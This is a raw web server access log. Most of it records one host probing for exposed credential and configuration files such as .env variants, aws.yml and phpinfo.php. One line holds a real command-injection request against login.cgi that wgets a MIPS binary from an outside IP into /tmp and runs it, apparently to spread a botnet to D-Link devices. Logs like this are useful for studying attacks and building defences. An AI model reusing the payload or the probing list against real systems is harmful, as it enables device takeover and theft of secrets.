178.62.36.21 - - [04/Jul/2022:02:44:15 +0200] "GET //phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:16 +0200] "GET //aws.yml HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:16 +0200] "GET //info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:17 +0200] "GET //config/aws.yml HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:18 +0200] "GET //.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:18 +0200] "GET //.env_old HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:19 +0200] "GET //vendor/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:19 +0200] "GET //core/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:20 +0200] "GET //config/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:20 +0200] "GET //app/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:21 +0200] "GET //web/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:21 +0200] "GET //public/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:44:22 +0200] "GET //en/.env.example HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:07 +0200] "GET //laravel/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:08 +0200] "GET //api/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:09 +0200] "GET //app/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:09 +0200] "GET //app/frontend/.env.example HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:09 +0200] "GET //application/.env.example HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:11 +0200] "GET //awstats/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:13 +0200] "GET //back-end/app/.env.example HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:15 +0200] "GET //backend/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:15 +0200] "GET //backup/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:16 +0200] "GET //bootstrap/.env.example HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:16 +0200] "GET //build/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:16 +0200] "GET //core/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:17 +0200] "GET //data/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:18 +0200] "GET //database/.env.example HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:19 +0200] "GET //demo/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:19 +0200] "GET //dev/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:20 +0200] "GET //developer/.env.example HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:20 +0200] "GET //django_project_path/.env.example HTTP/1.1" 404 337 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:21 +0200] "GET //docker/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:22 +0200] "GET //docs/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:45:22 +0200] "GET //en/.env.example HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:07 +0200] "GET //env/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:07 +0200] "GET //environments/.env.example HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:08 +0200] "GET //example/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:09 +0200] "GET //examples/.env.example HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:10 +0200] "GET //front-app/.env.example HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:11 +0200] "GET //front-empathy/.env.example HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:11 +0200] "GET //front-end/.env.example HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:12 +0200] "GET //front/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:13 +0200] "GET //frontend/.env.example HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:15 +0200] "GET //js/.env.example HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:16 +0200] "GET //local/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:16 +0200] "GET //log/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:16 +0200] "GET //mail/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:17 +0200] "GET //prod/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:17 +0200] "GET //production/.env.example HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:18 +0200] "GET //pub/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:18 +0200] "GET //public/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:19 +0200] "GET //rest/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:19 +0200] "GET //route/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:19 +0200] "GET //src/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:20 +0200] "GET //stag/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:21 +0200] "GET //staging/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:46:21 +0200] "GET //static/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.7.214.104 - - [04/Jul/2022:02:46:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:07 +0200] "GET //stats/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:08 +0200] "GET //storage/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:09 +0200] "GET //system/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:10 +0200] "GET //temp/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:11 +0200] "GET //test/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:12 +0200] "GET //tests/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:12 +0200] "GET //thumb/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:13 +0200] "GET //thumbs/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:13 +0200] "GET //tmp/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:14 +0200] "GET //vendor/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:14 +0200] "GET //vendor/laravel/.env.example HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:15 +0200] "GET //web/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:16 +0200] "GET //.env_bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:16 +0200] "GET //.env.suspected HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:16 +0200] "GET //.env.1 HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:16 +0200] "GET //.env~ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:17 +0200] "GET //.env.example.1 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:18 +0200] "GET //.env.example.suspected HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:18 +0200] "GET //core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:19 +0200] "GET //config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:19 +0200] "GET //app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:19 +0200] "GET //web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:20 +0200] "GET //public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:21 +0200] "GET //en/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:47:22 +0200] "GET //laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:07 +0200] "GET //api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:08 +0200] "GET //app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:08 +0200] "GET //app/frontend/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:08 +0200] "GET //application/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:09 +0200] "GET //awstats/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:09 +0200] "GET //back-end/app/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:11 +0200] "GET //backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:12 +0200] "GET //backup/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:12 +0200] "GET //bootstrap/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:13 +0200] "GET //build/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:14 +0200] "GET //core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:15 +0200] "GET //data/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:16 +0200] "GET //database/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:16 +0200] "GET //demo/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:17 +0200] "GET //dev/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:17 +0200] "GET //developer/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
115.86.164.63 - - [04/Jul/2022:02:48:18 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
178.62.36.21 - - [04/Jul/2022:02:48:19 +0200] "GET //django_project_path/.env HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:19 +0200] "GET //docker/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:20 +0200] "GET //docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:20 +0200] "GET //en/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:48:20 +0200] "GET //env/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:07 +0200] "GET //environments/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:09 +0200] "GET //example/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:09 +0200] "GET //examples/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:10 +0200] "GET //front-app/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:11 +0200] "GET //front-empathy/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:11 +0200] "GET //front-end/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:12 +0200] "GET //front/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:12 +0200] "GET //frontend/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:13 +0200] "GET //js/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:14 +0200] "GET //local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:14 +0200] "GET //log/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:15 +0200] "GET //mail/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
